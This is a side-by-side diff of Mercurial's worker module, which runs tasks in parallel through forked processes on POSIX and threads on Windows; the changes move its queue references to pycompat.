71 71 def worker(ui, costperarg, func, staticargs, args):
72 72 '''run a function, possibly in parallel in multiple worker
73 73 processes.
74 74
75 75 returns a progress iterator
76 76
77 77 costperarg - cost of a single task
78 78
79 79 func - function to run
80 80
81 81 staticargs - arguments to pass to every invocation of the function
82 82
83 83 args - arguments to split into chunks, to pass to individual
84 84 workers
85 85 '''
86 86 enabled = ui.configbool('worker', 'enabled')
87 87 if enabled and worthwhile(ui, costperarg, len(args)):
88 88 return _platformworker(ui, func, staticargs, args)
89 89 return func(*staticargs + (args,))
90 90
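A sketch of the contract ``worker`` expects from ``func``: it is called with the static args followed by a slice of ``args`` and must yield ``(progress, output)`` pairs, which come back interleaved across workers. ``_lengths`` and the surrounding ``ui`` are hypothetical:

    def _lengths(prefix, paths):
        # Hypothetical task function; output must be a one-line string
        # because the POSIX path serializes results over a pipe.
        for i, p in enumerate(paths):
            yield i, '%s%d' % (prefix, len(p))

    for done, res in worker(ui, 0.02, _lengths, ('len=',), ['a', 'bb', 'ccc']):
        ui.debug('%d -> %s\n' % (done, res))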
91 91 def _posixworker(ui, func, staticargs, args):
92 92 rfd, wfd = os.pipe()
93 93 workers = _numworkers(ui)
94 94 oldhandler = signal.getsignal(signal.SIGINT)
95 95 signal.signal(signal.SIGINT, signal.SIG_IGN)
96 96 pids, problem = set(), [0]
97 97 def killworkers():
98 98 # unregister SIGCHLD handler as all children will be killed. This
99 99 # function shouldn't be interrupted by another SIGCHLD; otherwise pids
100 100 # could be updated while iterating, which would cause inconsistency.
101 101 signal.signal(signal.SIGCHLD, oldchldhandler)
102 102 # if one worker bails, there's no good reason to wait for the rest
103 103 for p in pids:
104 104 try:
105 105 os.kill(p, signal.SIGTERM)
106 106 except OSError as err:
107 107 if err.errno != errno.ESRCH:
108 108 raise
109 109 def waitforworkers(blocking=True):
110 110 for pid in pids.copy():
111 111 p = st = 0
112 112 while True:
113 113 try:
114 114 p, st = os.waitpid(pid, (0 if blocking else os.WNOHANG))
115 115 break
116 116 except OSError as e:
117 117 if e.errno == errno.EINTR:
118 118 continue
119 119 elif e.errno == errno.ECHILD:
120 120 # child has already been reaped, but pids has not yet been
121 121 # updated (maybe interrupted just after waitpid)
122 122 pids.discard(pid)
123 123 break
124 124 else:
125 125 raise
126 126 if not p:
127 127 # skip subsequent steps, because child process should
128 128 # be still running in this case
129 129 continue
130 130 pids.discard(p)
131 131 st = _exitstatus(st)
132 132 if st and not problem[0]:
133 133 problem[0] = st
134 134 def sigchldhandler(signum, frame):
135 135 waitforworkers(blocking=False)
136 136 if problem[0]:
137 137 killworkers()
138 138 oldchldhandler = signal.signal(signal.SIGCHLD, sigchldhandler)
139 139 ui.flush()
140 140 parentpid = os.getpid()
141 141 for pargs in partition(args, workers):
142 142 # make sure we use os._exit in all worker code paths. otherwise the
143 143 # worker may do some clean-ups which could cause surprises like
144 144 # deadlock. see sshpeer.cleanup for example.
145 145 # override error handling *before* fork. this is necessary because
146 146 # exception (signal) may arrive after fork, before "pid =" assignment
147 147 # completes, and other exception handler (dispatch.py) can lead to
148 148 # unexpected code path without os._exit.
149 149 ret = -1
150 150 try:
151 151 pid = os.fork()
152 152 if pid == 0:
153 153 signal.signal(signal.SIGINT, oldhandler)
154 154 signal.signal(signal.SIGCHLD, oldchldhandler)
155 155
156 156 def workerfunc():
157 157 os.close(rfd)
158 158 for i, item in func(*(staticargs + (pargs,))):
159 159 os.write(wfd, '%d %s\n' % (i, item))
160 160 return 0
161 161
162 162 ret = scmutil.callcatch(ui, workerfunc)
163 163 except: # parent re-raises, child never returns
164 164 if os.getpid() == parentpid:
165 165 raise
166 166 exctype = sys.exc_info()[0]
167 167 force = not issubclass(exctype, KeyboardInterrupt)
168 168 ui.traceback(force=force)
169 169 finally:
170 170 if os.getpid() != parentpid:
171 171 try:
172 172 ui.flush()
173 173 except: # never returns, no re-raises
174 174 pass
175 175 finally:
176 176 os._exit(ret & 255)
177 177 pids.add(pid)
178 178 os.close(wfd)
179 179 fp = os.fdopen(rfd, r'rb', 0)
180 180 def cleanup():
181 181 signal.signal(signal.SIGINT, oldhandler)
182 182 waitforworkers()
183 183 signal.signal(signal.SIGCHLD, oldchldhandler)
184 184 status = problem[0]
185 185 if status:
186 186 if status < 0:
187 187 os.kill(os.getpid(), -status)
188 188 sys.exit(status)
189 189 try:
190 190 for line in util.iterfile(fp):
191 191 l = line.split(' ', 1)
192 192 yield int(l[0]), l[1][:-1]
193 193 except: # re-raises
194 194 killworkers()
195 195 cleanup()
196 196 raise
197 197 cleanup()
198 198
199 199 def _posixexitstatus(code):
200 200 '''convert a posix exit status into the same form returned by
201 201 os.spawnv
202 202
203 203 returns None if the process was stopped instead of exiting'''
204 204 if os.WIFEXITED(code):
205 205 return os.WEXITSTATUS(code)
206 206 elif os.WIFSIGNALED(code):
207 207 return -os.WTERMSIG(code)
208 208
209 209 def _windowsworker(ui, func, staticargs, args):
210 210 class Worker(threading.Thread):
211 211 def __init__(self, taskqueue, resultqueue, func, staticargs,
212 212 group=None, target=None, name=None, verbose=None):
213 213 threading.Thread.__init__(self, group=group, target=target,
214 214 name=name, verbose=verbose)
215 215 self._taskqueue = taskqueue
216 216 self._resultqueue = resultqueue
217 217 self._func = func
218 218 self._staticargs = staticargs
219 219 self._interrupted = False
220 220 self.daemon = True
221 221 self.exception = None
222 222
223 223 def interrupt(self):
224 224 self._interrupted = True
225 225
226 226 def run(self):
227 227 try:
228 228 while not self._taskqueue.empty():
229 229 try:
230 230 args = self._taskqueue.get_nowait()
231 231 for res in self._func(*self._staticargs + (args,)):
232 232 self._resultqueue.put(res)
233 233 # threading doesn't provide a native way to
234 234 # interrupt execution. handle it manually at every
235 235 # iteration.
236 236 if self._interrupted:
237 237 return
238 except util.empty:
238 except pycompat.queue.Empty:
239 239 break
240 240 except Exception as e:
241 241 # store the exception such that the main thread can resurface
242 242 # it as if the func was running without workers.
243 243 self.exception = e
244 244 raise
245 245
246 246 threads = []
247 247 def trykillworkers():
248 248 # Allow up to 1 second to clean worker threads nicely
249 249 cleanupend = time.time() + 1
250 250 for t in threads:
251 251 t.interrupt()
252 252 for t in threads:
253 253 remainingtime = cleanupend - time.time()
254 254 t.join(remainingtime)
255 255 if t.is_alive():
256 256 # pass over the failure to join the workers. it is more
257 257 # important to surface the initial exception than the
258 258 # fact that one of the workers may be processing a large
259 259 # task and does not get to handle the interruption.
260 260 ui.warn(_("failed to kill worker threads while "
261 261 "handling an exception\n"))
262 262 return
263 263
264 264 workers = _numworkers(ui)
265 resultqueue = util.queue()
266 taskqueue = util.queue()
265 resultqueue = pycompat.queue.Queue()
266 taskqueue = pycompat.queue.Queue()
267 267 # partition work to more pieces than workers to minimize the chance
268 268 # of uneven distribution of large tasks between the workers
269 269 for pargs in partition(args, workers * 20):
270 270 taskqueue.put(pargs)
271 271 for _i in range(workers):
272 272 t = Worker(taskqueue, resultqueue, func, staticargs)
273 273 threads.append(t)
274 274 t.start()
275 275 try:
276 276 while len(threads) > 0:
277 277 while not resultqueue.empty():
278 278 yield resultqueue.get()
279 279 threads[0].join(0.05)
280 280 finishedthreads = [_t for _t in threads if not _t.is_alive()]
281 281 for t in finishedthreads:
282 282 if t.exception is not None:
283 283 raise t.exception
284 284 threads.remove(t)
285 285 except (Exception, KeyboardInterrupt): # re-raises
286 286 trykillworkers()
287 287 raise
288 288 while not resultqueue.empty():
289 289 yield resultqueue.get()
290 290
291 291 if pycompat.iswindows:
292 292 _platformworker = _windowsworker
293 293 else:
294 294 _platformworker = _posixworker
295 295 _exitstatus = _posixexitstatus
296 296
297 297 def partition(lst, nslices):
298 298 '''partition a list into N slices of roughly equal size
299 299
300 300 The current strategy takes every Nth element from the input. If
301 301 we ever write workers that need to preserve grouping in input
302 302 we should consider allowing callers to specify a partition strategy.
303 303
304 304 mpm is not a fan of this partitioning strategy when files are involved.
305 305 In his words:
306 306
307 307 Single-threaded Mercurial makes a point of creating and visiting
308 308 files in a fixed order (alphabetical). When creating files in order,
309 309 a typical filesystem is likely to allocate them on nearby regions on
310 310 disk. Thus, when revisiting in the same order, locality is maximized
311 311 and various forms of OS and disk-level caching and read-ahead get a
312 312 chance to work.
313 313
314 314 This effect can be quite significant on spinning disks. I discovered it
315 315 circa Mercurial v0.4 when revlogs were named by hashes of filenames.
316 316 Tarring a repo and copying it to another disk effectively randomized
317 317 the revlog ordering on disk by sorting the revlogs by hash and suddenly
318 318 performance of my kernel checkout benchmark dropped by ~10x because the
319 319 "working set" of sectors visited no longer fit in the drive's cache and
320 320 the workload switched from streaming to random I/O.
321 321
322 322 What we should really be doing is to have workers read filenames from
323 323 an ordered queue. This preserves locality and also keeps any worker from
324 324 getting more than one file out of balance.
325 325 '''
326 326 for i in range(nslices):
327 327 yield lst[i::nslices]
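The strided slicing in one concrete case; slice lengths differ by at most one, and order within each slice follows the input:

    assert list(partition(list(range(10)), 3)) == [
        [0, 3, 6, 9],
        [1, 4, 7],
        [2, 5, 8],
    ]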